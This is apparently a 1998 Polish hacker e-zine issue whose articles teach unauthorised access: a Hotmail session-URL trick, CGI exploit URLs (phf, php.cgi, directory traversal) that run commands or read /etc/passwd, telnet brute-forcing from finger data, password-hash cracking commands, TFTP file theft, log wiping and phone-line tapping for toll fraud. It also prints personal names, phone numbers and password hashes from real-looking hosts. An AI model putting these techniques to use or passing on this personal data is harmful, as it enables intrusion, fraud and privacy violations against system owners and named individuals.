*** *** ****** ****** *** *** ******** ******

*** *** ******** ******** *** *** ********* ***

*** *** *** *** *** *** *** *** *** *** ***

*** *** *** *** *** *** *** *** *** ***

************ ********** *** ****** ********* *****

************ ********** *** ****** ****** *****

*** *** *** *** *** *** *** *** *** ***

*** *** *** *** *** *** *** *** *** *** ***

*** *** *** *** ******** *** *** *** *** ***

*** *** *** *** ****** *** *** *** *** *******

***** ***** ****** ******

****** ****** ******** ********

*** *** *** *** *** *** *** ***

*** ****** *** *** *** ***

*** **** *** ********** ***

*** *** ********** *** ****

*** *** *** *** *** ***

*** *** *** *** *** ***

*** *** *** *** ********

*** *** *** *** ******

=============================================================================

Mag na sierpien/wrzesien 1998 Numer 04 http://www.kki.net.pl/hackers

=============================================================================

Spis tresci:

1. Spis tresci

2. Slowo wstepne

3. Hotmail

4. Zdobywanie wielu kont

5. Phreak

6. Linki

7. Redakcja

-----------------------------------------------------------------------------

Wstep:

W poprzenim numerze pytalem ktora wersje (txt czy html) wolicie. Odpowiedzi

ktore nadeszly byly zarowno za wersja txt oraz html (z przewaga glosow za

html), wiec mag nadal bedzie wydawany w obu wersjach. Wersja orginalna zawsze

jest wtorzona w wersji tekstowej a dopiero pozniej przetwarzana na html.

Magazyn jak mozna zauwazyc jest dwu-miesiecznikiem i nic nie wskazuje na to

by sie to zmnienilo.

Richgyver

ps. Programow juz nie bede zamieszczal do magazynu tylko bede je umieszczal

na stronie www (http://www.kki.net.pl/hackers).

-----------------------------------------------------------------------------

Hotmail czesc 1:

Dosc znanym i dosc starym serverem udostepniajacym darmowe konta email jest

http://www.hotmail.com firmy Microsoft. Mozemy zalozyc sobie tam konto email

i miec do niego dostep przy pomocy przegladarki. Oczywiscie aby miec dostep

do swojego emaila musimy wpisac swoje haslo.... ale nie musimy. Jedna z

metod jest wpisanie w pole adresu przegladarki:

http://www.hotmail.com/cgi-bin/start/xxxxxxx

i w miejsce xxxxxx wpisac username (nazwe uzytkownika) czyli alias ktory

wystepuje przed znakiem @ w emailu danej osoby (xxxxxx@hotmail.com).

Czyli np. osoba ma adres email na serwerze hotmail:

zenek@hotmail.com

to wpisujemy w adres (w przegladarce):

http://www.hotmail.com/cgi-bin/start/zenek

Niestety ostatnio firma microsoft zwiekszyla troche zabezpeiczenia i

aby ta metoda dostac sie do konta ofiary musza byc spelnione nastepujace

warunki:

1. ofiara musiala kozystac ze swojego konto w ciagu ostatniej godziny

2. musimy miec ten sam adres IP co ofiara (wiec siedziec albo na tym samym

komputerze co nasza "ofiara" lub uzywac tego samego servera proxy)

Te warunki troche nam zmniejszaja szanase dostania sie ta metoda do konto

naszej "ofiary"... ale nastepne mozliwosc w nastepnym numerze.

Richgyver

-----------------------------------------------------------------------------

Zdobywanie wielu kont:

czesc 2: Analiza zdobytych danych: netstat, finger,

tftp, dziury w scriptach CGI-BIN...

Port surfing, wlamanie z wykorzystaniem

metody brutal force oraz po zlamaniu

hasla ze zdobytego pliku passwd

[ ewentualnie shadow ]...

=============================================================================

Dobra, spotykamy sie juz po raz drugi. Mam nadzieje, ze

kazdy zainteresowany zdobyl juz ( wykorzystujac metody z czesci 1 )

informacje potrzebne nam do tego artykulu. Jest tam duzo

informacji, ktorych sens postaram sie wam dalej wytlumaczyc.

***************************** NETSTAT **********************************

Netstat ( czyli Network Statistic ) daje nam wiele ciekawych

informacji, ktore mozemy wykorzystac potem do surfowania

po portach ( obecnie czesciej wykonuje sie to za pomoca

roznych skanerow, ale "wlasnoreczne" przeszukiwanie daje

nam wiecej satysfakcji :) Zagladamy wiec w plik raportu,

jaki stworzylismy wczesniej ( czesc 1 ). Powinno tam sie

znajdowac cos takiego:

Trying xxx.xxx.xxx.xxx...

Connected to xxx.xxx.xxx.xxx.

Escape character is '^]'.

Active Internet connections (including servers)

Proto Recv-Q Send-Q Local Address Foreign Address (State)

tcp 0 0 *:673 *:* LISTEN

tcp 0 0 *:8080 *:* LISTEN

tcp 0 0 *:netbios-ssn *:* LISTEN

tcp 0 0 *:nntp *:* LISTEN

tcp 0 0 *:auth *:* LISTEN

tcp 0 0 *:sunrpc *:* LISTEN

tcp 0 0 *:pop3 *:* LISTEN

tcp 0 0 *:www *:* LISTEN

tcp 0 0 *:finger *:* LISTEN

tcp 0 0 *:domain *:* LISTEN

tcp 0 0 *:time *:* LISTEN

tcp 0 0 *:smtp *:* LISTEN

tcp 0 0 *:telnet *:* LISTEN

tcp 0 0 *:ftp *:* LISTEN

tcp 0 0 *:chargen *:* LISTEN

tcp 0 0 *:netstat *:* LISTEN

tcp 0 0 xxx.xxx.xxx.xxx:netstat ppp-rapxxx.konin:15558 ESTABLISHED

tcp 0 0 *:daytime *:* LISTEN

tcp 0 0 *:systat *:* LISTEN

tcp 1 0 xxx.xxx.xxx.:systat ppp-rapxxx.konin:15546 TIME_WAIT

tcp 1 0 xxx.xxx.xxx.:systat ppp-rapxxx.konin:15549 TIME_WAIT

tcp 1 1 xxx.xxx.xxx.xxx:1290 ppp-rapxxx.konin.:auth CLOSING

tcp 0 0 *:discard *:* LISTEN

tcp 1 0 xxx.xxx.xxx.xxx:1288 ppp-rapxxx.konin.:auth TIME_WAIT

tcp 0 0 *:echo *:* LISTEN

tcp 1 0 xxx.xxx.xxx.xxx:1286 ppp-rapxxx.konin.:auth TIME_WAIT

tcp 0 0 *:printer *:* LISTEN

tcp 0 0 *:shell *:* LISTEN

tcp 0 0 *:login *:* LISTEN

tcp 0 0 *:2049 *:* LISTEN

udp 0 0 *:671 *:*

udp 0 0 *:netbios-ns *:*

udp 0 0 *:sunrpc *:*

udp 0 0 *:3130 *:*

udp 0 0 *:domain *:*

udp 0 0 localhost:domain *:*

udp 0 0 xxx.xxx.xxx.:domain *:*

udp 0 0 *:time *:*

udp 0 0 *:chargen *:*

udp 0 0 *:daytime *:*

udp 0 0 *:discard *:*

udp 0 0 *:echo *:*

udp 0 0 *:ntalk *:*

udp 0 0 *:syslog *:*

udp 0 0 *:2049 *:*

udp 0 0 *:biff *:*

raw 0 0 *:1 *:*

Active UNIX domain sockets

Proto RefCnt Flags Type State Path

unix 2 [ ] SOCK_STREAM CONNECTED 678

unix 2 [ ] SOCK_STREAM UNCONNECTED 679

unix 2 [ ] SOCK_STREAM CONNECTED 682

unix 2 [ ] SOCK_STREAM UNCONNECTED 687

unix 2 [ ] SOCK_STREAM CONNECTED 690

( wycialem ostatnia kolumne - user [ ale nie bylo w niej nic ciekawego ] )

Sprobujmy wiec przeanalizowac, co tu mamy.

Pierwsza kolumna to ptotokul:

IP - internet protocol, pseudo protocol number

ICMP - internet control message protocol

GGP - gateway-gateway protocol

TCP - transmission control protocol

EGP - exterior gateway protocol

PUP - PARC universal packet protocol

UDP - user datagram protocol

HMP - host monitoring protocol

XNS-IDP - Xerox NS IDP

RDP - "reliable datagram" protocol

( najczesciej jest TCP [ Transmission Control Protocol ], lub UDP [ User

Datagram Protocol ] ), dalej Recived-Q i Sended-Q ( ktore nie sa dla nas

istotne ), Local Adress ( nazwa portu ), Foreign Adress ( adres komputera

laczacego sie z danym portem ), state ( status portu ), user ( uzytkownik )

Podstawowe porty, jakie powinienes znac to:

Nazwa: Nr.portu: Usluga:

echo 7 Cokolwiek napiszesz host odpisze to samo

discard 9 /dev/null

systat 11 Uruchamia na serwerze komende ps -auwwx

daytime 13 Czas i data na hoscie

netstat 15 Wlasnie to uruchomiles :) ( network statistic )

chargen 19 Zwraca nam ciag znakow ASCII. Aby je zatrzymac - ^C

ftp 21 File Transfer Protocol ( wiadomo )

telnet 23 Telnet ( wiadomo )

smpt 25 Poczta ( uzywajac tego portu mozna wysylac fake maile )

time 37 Zwraca czas

domain 53 Nazwa serwera

finger 79 Informacje o uzytkownikach

http 80 Serwer WWW

login 513 Login :)

shell 514 Zdalny shell

Teraz mozesz przeszukac serwer w poszukiwaniu czyis backdoors

lub laczyc sie z odpowiednim portem i probowac zdobyc jak najwiecej

danych. Kiedys mozna bylo wywolac przepelnienie stosu za pomoca

fingera ( wykorzystywala to bakteria Morrisa ) a tym samym zdobyc roota.

[ Wystepowalo to, gdy informacja podawana przez uzytkownika byla

dluzsza niz 512 bajtow. Demon fingerd przepelnial stos i pozwalal

na uruchomienie shella ]

Po polaczeniu na port 79 ( finger ;) mozemy wywolac 1 komende,

po czym zostajemy rozlaczeni. Jest to rownoznacze z wywolaniem:

% finger xxxxx@xxx.xxx.xxx.xxx

( lecz czasem podobno dzialaja takie komendy jak: help, ?, man

mi nie dzialaly, ale tak gdzies czytalem, chcecie to probujcie ;)

[ dla lamerow: ]

[ laczenie z odpowiednim portem: % telnet xxx.xxx.xxx.xxx nr.portu ]

******************************* FINGER **********************************

Teraz znow o FINGERze, ale w nieco innej formie.

Otoz zwraca nam on bardzo ciekawe informacje. W pliku

raport stworzonym po przeczytaniu 1 czesci artykulu powinno

znajdowac sie cos takiego:

....

[kinga.cyf-kr.edu.pl]

Login name: ucjaneck (messages off) In real life: Dariusz Janecki

Bldg: Uniwersytet, Work phone: 633 63 77w.229

Directory: /home/ucjaneck Shell: /usr/bin/tcsh

On since May 16 15:55:23 on ttyp1 from eter213.ch.uj.ed

13 minutes Idle Time

No Plan.

Login name: eyolejni (messages off) In real life: Barbara Olejnik

Bldg: Akademia Ek, Work phone: 616 76 98

Directory: /home/eyolejni Shell: /usr/bin/tcsh

On since May 16 15:51:18 on ttyp4 from pc8-153.ae.krako

2 minutes 31 seconds Idle Time

No Plan.

....

Wszystko jest chyba jasne. Mamy prawdziwe imie i nazwisko

tych ludzi, ich numery telefonow i kilka innych informacji.

Finger jest jednak coraz czesciej wylaczany przez administratorow,

w obawie przed zlymi hackerami i tzw. " system crackers " :)

Jest wiec wykomentowany z inetd.conf:

# finger stream tcp nowait nobody /usr/sbin/tcpd in.fingerd -w

Lub zamieniany na program, ktory po wywolaniu portu 79 zamiast

informacji o uzytkownikach wyswietli nam jakis napisik. Z ciekawszych,

jakie znalazlem to:

....

[giovanni.wmsd.edu.pl]

Sorry, no bonus this time...

[service.amu.edu.pl]

Sorry, finger is locked

[shadow.put.poznan.pl]

Politechnika Poznanska Poznan University of Technology

Uczelniane Centrum Obliczeniowe Computing Centre

------------------------------- --------------------------------

Dostep do tego systemu jest Access to this system is limited

ograniczony wylacznie dla komputerow only for hosts authorized by

autoryzowanych przez Uczelniane Centrum Computing Centre of Poznan

Obliczeniowe Politechniki Poznanskiej University of Technology

unknown@ppp-rapxxx.konin.tpnet.pl :)

nie ma autoryzacji zezwalajacej is not authorized to access

na dostep do systemu orion.put.poznan.pl orion.put.poznan.pl host

hostmaster@orion.put.poznan.pl

....

To ostatnie bylo chyba dzielem jakiegos wrappera ograniczajacego

dostep do tej uslugi ( ale i tak mi sie podobalo :).

Na wielu hostach jednak finger jeszcze dziala i mozna probowac.

********* /etc/passwd ( np. z plikow stworzonych przez monk.sh ) ************

Podobnych informacji co finger moze nam dostarczyc plik /etc/passwd

nawet jesli hasla sa shadowane. Wyglada to tak:

....

stink:x:1048:100:Gary Fisher,,415-306-9466,:/usr/home/stink:/bin/tcsh

....

ion:x:1051:100:Matt Glaspie,ION,810-669-1564,:/usr/home/ion:/bin/sh

....

A wiec otrzymujemy prawie te same informacje, co przy uzyciu fingera:

Login: stink

In real life: Gary Fisher

Organizacja: -

Numer telefonu: 415-306-9466

Katalog macierzysty: /usr/home/stink

Shell: /bin/tcsh

UID=1048

GID=100

Login:ion

In real life: Matt Glaspie

Oranizacja: ION

Numer telefonu: 810-669-1564

Katalog macierzysty: /usr/home/ion

Shell: /bin/sh

UID=1051

GID=100

Widzimy rowniez, ze wszyscy uzytkownicy naleza do grupy o GID=100

W tym przypadku numery telefonow i firma nie maja dla nas

wiekszej wartosci, ale jesli mamy plik passwd z polskiego

serwera, np.

....

pelka:x:558:110:Ania Pelka,OINiD,826-40-47,664-42-79:/home/PELKA:/bin/tcsh

....

kopyszew:x:593:110:Eugeniusz Kopyszew,

UW Wydz.Polonistyki,10-32-31(p.911),10-32-31(p.911):/home/kopyszew:/bin/bash

....

No coz - tutaj chyba wszystko jest jasne...

Do czego moga nam sie przydac informacje zdobyte fingerem ?

Otoz najprostrza forma dostania sie na czyjes konto jest

atak sposobem brutal force ( czyli zgadywanie hasel sposobem

chybil-trafil ). Wbrew pozorom akcja taka ma duze szanse

powodzenia. Wywolujemy wiec klienta telnetu, laczymy sie

z serwerem i mozemy probowac zgadnac haslo wykorzystujac:

login, imie, nazwisko, imie od konca, nazwisko od konca,

polaczenie imienia z nazwiskiem ( 3 litery imienia + 3 nazwiska,

itp. ), wszystko to uzupelnione cyfra 1, 0 ( pozostale

rzadko sie zdarzaja ), lub kilkoma cyframi ( np. 123, 098,

997, 998, 999 ), wykorzystujemy tez numer telefonu i inne

informacje ( strona WWW ). Kiedys udalo mi sie

w ten sposob zlamac kilka kont.

Calosc wygladala mniej wiecej tak:

% telnet

telnet> op xxx.xxx.xxx.xxx

Trying xxx.xxx.xxx.xxx...

Connected to xxx.xxx.xxx.xxx

Escape character is '^]'.

FreeBSD (xxx.xxx.xxx.xxx) (ttyp0)

login: ofiara

Password: / tu wpisywalem hasla

Login incorrect / ale tego nie widac :)

login: ofiara

Password:

Login incorrect

login: ofiara

Password:

Login incorrect

login: ofiara

Password:

Login incorrect

login: ofiara

Password:

Login incorrect

login: ofiara

Password:

Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994

The Regents of the University of California. All rights reserved.

FreeBSD 2.2.6-BETA (hoth_ipf) #0: Sun Mar 15 13:03:32 MET 1998

Uzytkownik poprzez zalogowanie sie na swoje konto deklaruje, ze zapoznal

sie z Regulaminem oraz ze wyraza zgode na wszelkie formy monitorowania

swojej dzialalnosci i na wykorzystanie logow systemowych we wszelkich

sprawach administracyjnych, cywilnych i karnych.

Aktualny Regulamin: /regulamin

Zalecenia Bezpieczenstwa: /secure

Komunikaty Administratora: /admin

Welcome to FreeBSD!

You have mail.

tset: terminal type linux is unknown

Terminal type? ^D

Technological progress has merely provided us with more efficient means

for going backwards.

-- Aldous Huxley

xxxx: {1} ls

allegro.cfg mail public_html

xxxx: {2}

To jest zmieniony troche log sesji, a zamiescilem go

po to, aby ukazac, ze zgadniecie czyjegos hasla

jest naprawde mozliwe.

( zalaczam programik, ktory robi to za nas - brute.c )

( uzywamy go ( po kompilacji :) w polaczeniu ze slownikiem )

( $ brute ofiara slownik adres.serwera 23 )

Trzeba natomiast pamietac, ze wszelkie bledne proby logowania

sie zostana odnotowane w logach. Trzeba wiec albo nie przesadzac

z " napastowaniem " serwera ( po 2-3 proby dziennie ), albo

po dostaniu sie do systemu zdobyc roota i wyczyscic logi :)

Inna sprawa jest, ze ludzie sa naiwni i mozna od nich

wyludzic haslo nawet przez telefon :)))

Ja osobiscie nie lubie tego typu atakow, ale w chwili

desperacji ( gdy wszystkie znane dziury w serwerze sa

zapchane ) mozna probowac i tak. Trzeba oczywiscie

dobrac odpowiednio ofiare ( najlepsza jest kobieta,

starsza [ np. bibliotekarka, kustosz muzeum ] )

Naprawde mozna sie wiele dowiedziec o czlowieku przegladajac

strony WWW i laczac znalezione tam informacje np. z FINGERem.

No i trzeba to sprytnie wykorzystac...

Plik passwd mozemy obejrzec majac dostep do systemu za pomoca komendy

cat ( jesli hackujemy pod SHITem 95 mozemy ustawic logowanie

sesji i obejrzec je na spokojnie potem ). Nie chce mi sie tu rozpisywac

na temat sciagania hasel, gdy jestesmy juz w systemie,

bo nie o tym jest artykul. Grunt ze mozna je sciagnac za pomoca ftp

( ale nie anonimowego, bo wtedy glownym katalogiem dla nas nie jest / )

( lecz /home/ftp, tak wiec widziany przez nas plik /etc/passwd )

( to w rzeczywistosci /home/ftp/etc/passwd [ chociaz czasem )

( administratorzy sa na tyle glupi, ze przegrywaja plik /etc/passwd )

( do /home... ] )

% ftp xxx.xxx.xxx.xxx

Connected to xxx.xxx.xxx.xxx

220 xxx.xxx.xxx.xxx FTP server ready.

Name (xxx.xxx.xxx.xxx:twoj_login): nazwa_konta

Password: haslo_dla_tego_konta

ftp> get /etc/passwd /tmp/mam.je.u.siebie

....

ftp> quit

% _

Mozna tez wyslac plik passwd na jakies swoje trefne konto pocztowe.

Itp., itd. - gdy juz mamy konto, sposobow jest naprawde full...

Gdy hasla nie sa shadowane ( co obecnie zadko sie zdarza,

choc jakis miesiac temu znalazlem taki system, [ a tydzien temu drugi :) ])

znajduja sie w pliku /etc/passwd w postaci zakodowanej. Wyglada

to tak:

....

markl:93IGeQL45BmCk:549:100:Mark Lavery:/home/markl:/bin/tcsh

urgent:39Li4tqFigKbA:550:100:Jerry Burger:/home/urgent:/bin/tcsh

getitback:614QgdDEz8N2k:551:100:Gil Ziniga:/home/getitback:/bin/tcsh

....

Gdzie druga czesc linii ( po dwukropku ) to haslo ( zakodowane ).

Aby je zlamac trzeba uzyc programu lamiacego oraz slownika.

Programy takie sa ogolnie dostepne ( najlepsze to:

Cracker Jack, czy John the Ripper ). Dzialaja one

pod DOSem ( chociaz widzialem wersje Johna pod Unixa ).

W celu zlamania hasla musimy miec liste prawdopodobnych hasel

( tzw. slownik ;). Na jakiej zasadzie dziala program lamiacy ?

Zeby to zrozumiec nalezaloby najpierw zastanowic sie

w jaki sposob hasla sa kodowane przez systemy unixowe.

Otoz system koduje haslo ( max. 8 znakowe ) do 4096

wzorcow ( z ktorych kazdy ma po 13 znakow ) i jeden

z takich wzorcow zapisuje w pliku passwd lub shadow.

Mechanizm kodowania hasel jest jednostronny, a to oznacza,

ze hasel tych nie da sie odkodowac. Tak wiec programy

takie jak John The Ripper aby odkodowac haslo potrzebuja

listy slow, ktore kolejno koduja ( uzywajac tych samych

algorytmow co Unix ) do 4096 kombinacji i kolejno

przyrownuja do tego, ktore znajduja w pliku passwd.

Jesli oba zakodowane hasla sa identyczne, oznacza

to, ze znalezlismy haslo ( co sygnalizowane jest

cudownym beeeep z PC-Speaker'a ;)

OK. Jak uzywac Johna, czy Jacka?

Ja osobiscie wole John the Ripper'a (v1.4). Aby go uruchomic przeciwko

plikowi z haslami piszemy najpierw:

C:\JOHN> john.com -beep -single -pwfile:passwd

Co powoduje lamanie hasel bazujac na loginach, imionach i nazwiskach

uzytkownikow ( oraz ich przeksztalceniach ). Wszelkie przeksztalcenia

mozemy ustalic w pliku john.ini. W pliku john.pot znajduja sie

zlamane hasla, a w restore - dane ktore po przerwaniu programu pozwalaja

nam zaczac od ostatniego sprawdzonego slowa [ C:\JOHN> john.com -restore ]

Aby sprawdzic plik passwd z naszym slownikiem uruchamiamy:

C:\JOHN> john.com -beep -pwfile:passwd -wordfile:slownik

Ale lepiej jest odrazu wpisac:

C:\JOHN> john.com -beep -rules -pwfile:passwd -wordfile:slownik

Co spowoduje przeksztalcanie slow z naszej listy ( pierwsza litera

wielka, ostatnia, +cyfry, tworzenie form w czasie przeszlym

( +ed ), liczby mnogiej ( +s ) i inne ). Slowniki mozemy

sobie tworzyc sami, wyciagac slowa z plikow ( program extract.exe

z pakietu Cracker Jacka ), lub sciagnac z jakiejs fajnej strony WWW ;)

Co do Cracker Jacka to sprawa jest duzo prostrza. Piszemy:

C:\CJACK> jack.exe passwd slownik

i dziala. Podobnie jak w Johnie jack.pot - info o zlamanych

haslach, restore - dane do wznowienia sesji.

Acha... wznawianie sesji:

C:\CJACK> jack.exe -restore

Jesli nie mozemy zlamac hasla ( nie mamy go w slowniku nawet

po licznych permutacjach ), a jest ono dla nas bardzo wazne

( np. haslo root'a ), mozemy sprobowac zlamac je metoda

brutal force ( sprawdzic wszelkie mozliwe kombinacje liter ).

Do tego celu mozecie uzyc mojego programiku o nazwie

BrutaLDictor, ktory zalaczam do artykulu ( opis w pliku bdictor.txt )

Gdy program zlamie nam haslo mozemy sie zalogowac

na to konto uzywajac zdobytego hasla.

***************** SCRIPTY CGI-BIN ************************

Ciekawsza rzecza jest zdobycie pliku z haslami bez dostepu

do konta w systemie. Mozna to np. zrobic wykorzystujac

dziury w scriptach CGI-BIN z HTTPD. Sa one dosc stare i bardzo

rzadko dzialaja :(

I znow mozemy zdobyc albo plik z haslami zakodowanymi,

albo z "x" lub "*" w miejscu hasel ( oznacza to, ze

hasla sa shadowane i znajduja sie najczesciej w pliku

/etc/shadow, ale np. na FreeBSD 2.2.6 sa w /etc/master.passwd,

ich lokalizacje w roznych systemach podam na koncu artykulu ).

A oto kilka bardziej znanych dziur w tych scriptach.

Przypominam, ze uruchamiamy je z poziomu przegladarki

( np. IE czy Netscape pod Windowsem, czy lynx pod linuxem ).

Wiec wyglada to tak:

1). http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

gdzie:

Linie rozpoczynamy od: %0a

Zamiast spacji wstawiamy: %20

Mozemy w ten sposob uruchomic dowolna komende unixa, np.

http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0aid

http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/services

http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/ident.conf

http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/var/log/messages

http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/var/log/syslog

i inne w celu lepszego zapoznania sie z serwerem.

Nie mozna jednak uzywac mechanizmu potokow (|), przepisywac shelli,

dodawac + + do .rhosts , itp.

Pamietac nalezy rowniez, ze nasza dzialalnosc jest odnotowywana

w logach.

Dalszy komentarz jest chyba zbedny - wyswietlaja plik /etc/passwd :)

[ oczywiscie w ten sposob mozna obejrzec dowolny plik na serwerze ]

2). http://xxx.xxx.xxx.xxx/cgi-bin/php.cgi?/etc/passwd

3). http://xxx.xxx.xxx.xxx/cgi-bin/view-source?../../../../../../etc/passwd

4). http://xxx.xxx.xxx.xxx/cgi-bin/campas?%a/bin/cat%0a/etc/passwd

A te dzialaja na serwerach opartych na IRiX'ie:

5). http://xxx.xxx.xxx.xxx/cgi-bin/wrap?/etc / pokazuje zawartosc

/ katalogu /etc

/ i analogicznie inne

6). http://xxx.xxx.xxx.xxx/cgi-bin/webdist?distloc=;cat%20/etc/passwd

7). http://xxx.xxx.xxx.xxx/cgi-bin/handler/useless_shit;cat

/etc/passwd|?data=Download

W ten sam sposob mozna probowac sciagnac /etc/shadow, ale

szanse male.

Do tego artykulu dodam przerobiona przeze mnie wersje

scriptu monk.sh z pakietu XENOLITH. Testuje ona

wszyskie wymienione wyzej dziury.

( nazwa: cgitest )

( uruchomienie: % cgitest lista.serwerow )

********************* TFTP *****************************

W pliku z raportem z polaczen z TFTP zapewne nie znajdziesz

duzo. Jesli jednak znajdziesz serwer, z ktorym mozesz

sie polaczyc na port 69, uruchom klienta tftp i sprobuj

sciagnac plik passwd.

% tftp

tftp> connect xxx.xxx.xxx.xxx

tftp> get /etc/passwd /tmp/mam.je.u.siebie

tftp> quit

Jesli operacja taka sie powiedzie ( nie sa nalozone restrykcje

co do katalogu ) - masz hasla.

=============================================================================

W nastepnym numerze:

Sendmail, NFS, informacje z portu 11 ( systat ) i moze cos jeszcze ;)

=============================================================================

Pozdrowienia dla: KeenU'a, Kubi'ego, Dante, Sir D, BoBo i pozostalych.

" Nil mortalibus ardui (e)st... " - Horacy

arkth

-----------------------------------------------------------------------------

Phreak:

Chcialem na poczatku wyjasnic, coz to takiego oznacza slowo "PHREAK".

Oznacza to po prostu proby/czynnosc zwiazane z mozliwosciami dzwonienia przez

telefon i nie placac za to. Jest wiele sposobow na wykonywanie ww. czynnosci.

Kiedys (jakies dziesiec lat temu) bylo to dosc proste, dzis Telekomunikacja

Polska przeznacza dosc duze pieniadze na to by kazdy placil wszystkie rozmowy

telefoniczne. Ale tu nic na razie o tym nie bedzie, chcialbym tu napisac jak

TPSA (Telekomunikacja Polska Spolka Akcyjna) dba o to aby za kazda wykonana

rozmowe ktos zaplacil (ale kto to juz ich nie interesuje).

Otoz jak ktos nie ma co robic z pieniedzmi to moze sobie podlaczyc do

domu dwie linie telefoniczne (dwa numery telefoniczne). Jednym z takich ludzi

jestem ja (choc nie mam za duzo pieniedzy). Chodzi o to, ze ten drugi telefon

jest podlaczony do takiej malej skrzynki, ktora znajduje sie na mojej klatce

schodowej. Wszystko niby dobrze tylko po pewnym czasie na tej lini slyszalem

straszne trzaski, wiec dzwonie do TPSA, a na drugi dzien przyszedl jakis

facet. I co? I ten nie pozorny facet wzial srubokret, odkrecil dwie skrobki,

podlaczyl dwa kabelki do swojej sluchawki i juz dzwonil na moj koszt. Czyli

mogl kazdy przyjsc w nocy, zrobic to samo i dzwonic sobie na numery typu

0700 na moj koszt. Dwie plastikowe srobki to jest zabezpieczenie przed utrata

tysieczy zlotych jakie w taki sposob mozna komus nabic na liczniku w TPSA?

Co z tego wynika, to ze: nie nalezy dokladac sobie nowych lini telefonicznych

(jesli ktos mieszka w bloku) oraz gdy chcemy sobie podzwonic na numer numery

0700 to nalezy tylko poszukac takiej skrzynki i podlaczyc tam sluchawke.

Kiedys slyszalem w "informacjach" telewizyjnych, ze ktos sadowal sie z TPSA

wlasnie o to czy ww. typ skrzynki byl dobrze zabezpieczony (ktos mu nabil

licznik telefoniczny), podobno TPSA przegrala sprawe. To tyle na dzis.

nikito

-----------------------------------------------------------------------------

Linki do interesujacycg stron:

-strony zwiazane z h/p/c/v/a

-http://www.kki.net.pl/hackers

-http://www.inet.com.pl/rafal

-http://hack.netpol.pl

-http://kki.net.pl/glider

-http://www.kki.net.pl/~masher

Twoja strona tez moze znalezc sie w tym spisie. Musisz najpierw:

1. Umiescic ten "kawalek" kodu html na swojej stronie:

<-- Poczatek odnosnika do hackersmag -->

<-- Koniec odnosnika -->

2. Napisac do nas email (zadresowany do hackers@kki.net.pl) z informacja

o adresie twojej strony.

Jesli wszystko zrobiles poprawnie twoja strona zostanie umieszczona w naszym

spisie najciekawszych stron.

-----------------------------------------------------------------------------

W sklad redakcja tego maga wchodza:

-Richgyver (hackers@kki.net.pl)

-Lukas (chopin@friko.onet.pl)

-Arkth (arkth@friko4.onet.pl)

-nikito (superc@friko.sos.com.pl)

Jesli chcial cos napisac do naszego maga (a nam to sie by spodobalo)

lub napisales juz jakis tekst to wyslij to na adres: hackers@kki.net.pl

ze swoimi danymi. Kazdy taki piszacy do naszego maga dostanie wynagrodzenie

(pieniadze).

Zawsze wszystkie numery poprzednie oraz najnowszy numer naszego magazynu

mozesz sciagnac ze strony: http://www.kki.net.pl/hackers

Mozesz do nas napisac list, nasz email: hackers@kki.net.pl

Wszystkie materialy i informacje zawarte sa tu jedynie w celach

*EDUKACYJNYCH* i nikt z redakcji nie ponosi *ZADNEJ* odpowiedzialnosci, za

zle wykorzystanie podanych tu informacji...

/Koniec pliku tekstowego./

---